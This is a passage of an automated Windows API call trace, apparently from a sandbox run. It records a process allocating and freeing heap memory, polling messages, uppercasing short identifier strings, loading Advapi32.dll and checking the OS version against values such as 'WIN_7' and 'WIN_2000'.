(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.684] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.684] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.685] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.685] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.685] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.688] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.689] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.689] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.689] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0258.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.691] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.691] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.691] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.692] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.693] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.694] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.695] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.695] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 